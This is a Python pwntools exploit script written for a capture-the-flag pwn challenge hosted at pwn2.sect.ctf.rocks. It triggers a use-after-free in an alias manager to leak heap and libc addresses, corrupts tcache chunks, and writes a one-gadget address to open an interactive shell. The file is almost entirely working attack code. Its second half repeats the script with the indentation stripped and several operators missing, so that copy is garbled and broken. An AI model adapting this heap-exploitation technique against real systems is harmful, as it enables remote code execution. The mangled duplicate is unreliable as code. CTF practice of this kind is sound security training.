chmodxxx/exploit.py

## exploit.py
from pwn import *
import re


def update(alias, name, desc, cash):
	p.recvuntil('> ')
	p.sendline('update %s' % alias)
	p.recvuntil('Name: ')
	p.sendline(name)
	p.recvuntil('Desc: ')
	p.sendline(desc)
	p.recvuntil('Cash: ')
	p.sendline(str(cash))

def show(alias):
	p.recvuntil('> ')
	p.sendline('show %s' % alias)
	return p.recvuntil('Options')

def alias(name, desc, alias):
	p.recvuntil('> ')
	p.sendline('create %s' % alias)
	p.recvuntil('Name: ')
	p.sendline(name)
	p.recvuntil('Desc: ')
	p.sendline(desc)

def freealias(alias):
	p.recvuntil('> ')
	p.sendline('remove %s' % alias)


def exploit():
	alias('Aa', 'A'*0x40, 'a')
	freealias('a')
	heap = re.findall('Desc:  (.*)', show('a'))[0]
	heap = u64(heap.ljust(8,'\x00'))
	log.info('Heap : %s ' % hex(heap))
	for i in range(8):
		alias('A%d'%i,'A'*0x50,'a%d'%i)
	for i in range(8):
		freealias('a%d'%i)

	for i in range(8):
		alias('A%d'%i,'A'*0x90,'b%d'%i)
	alias('Ab','A'*0x30,'b')
	for i in range(8):
		freealias('b%d'%i)

	libc = re.findall('Desc:  (.*)', show('b7'))[0]
	libc = u64(libc.ljust(8,'\x00'))
	log.info('Libc : %s' % hex(libc))

	for i in range(7):
		alias('B%d'%i, 'B'*0x40, 'c%d'%i)

	alias('Ad', 'E'*0x40, 'd1')
	freealias('d1')
	oneGoffset = 0x4f322
	update('d1','Ad', 'A'*6 + '\x00'*30,1)
	update('d1','Ad', p64(libc - 0x92) ,1)
	alias('Ae','A'*0x30 ,'e')
	hack = libc - 0x70 - 0x3ebc30 + oneGoffset
	alias('A'*26 + p64(hack),'A'+'\x00'*0x40 ,'f')
	p.interactive()

if __name__ == '__main__':
	p = remote('pwn2.sect.ctf.rocks', 2024)
	pause()
	exploit()
	from pwn import *
	import re


	def update(alias, name, desc, cash):
	p.recvuntil('> ')
	p.sendline('update %s' % alias)
	p.recvuntil('Name: ')
	p.sendline(name)
	p.recvuntil('Desc: ')
	p.sendline(desc)
	p.recvuntil('Cash: ')
	p.sendline(str(cash))

	def show(alias):
	p.recvuntil('> ')
	p.sendline('show %s' % alias)
	return p.recvuntil('Options')

	def alias(name, desc, alias):
	p.recvuntil('> ')
	p.sendline('create %s' % alias)
	p.recvuntil('Name: ')
	p.sendline(name)
	p.recvuntil('Desc: ')
	p.sendline(desc)

	def freealias(alias):
	p.recvuntil('> ')
	p.sendline('remove %s' % alias)


	def exploit():
	alias('Aa', 'A'*0x40, 'a')
	freealias('a')
	heap = re.findall('Desc: (.*)', show('a'))[0]
	heap = u64(heap.ljust(8,'\x00'))
	log.info('Heap : %s ' % hex(heap))
	for i in range(8):
	alias('A%d'%i,'A'*0x50,'a%d'%i)
	for i in range(8):
	freealias('a%d'%i)

	for i in range(8):
	alias('A%d'%i,'A'*0x90,'b%d'%i)
	alias('Ab','A'*0x30,'b')
	for i in range(8):
	freealias('b%d'%i)

	libc = re.findall('Desc: (.*)', show('b7'))[0]
	libc = u64(libc.ljust(8,'\x00'))
	log.info('Libc : %s' % hex(libc))

	for i in range(7):
	alias('B%d'%i, 'B'*0x40, 'c%d'%i)

	alias('Ad', 'E'*0x40, 'd1')
	freealias('d1')
	oneGoffset = 0x4f322
	update('d1','Ad', 'A'6 + '\x00'30,1)
	update('d1','Ad', p64(libc - 0x92) ,1)
	alias('Ae','A'*0x30 ,'e')
	hack = libc - 0x70 - 0x3ebc30 + oneGoffset
	alias('A'26 + p64(hack),'A'+'\x00'0x40 ,'f')
	p.interactive()

	if __name__ == '__main__':
	p = remote('pwn2.sect.ctf.rocks', 2024)
	pause()
	exploit()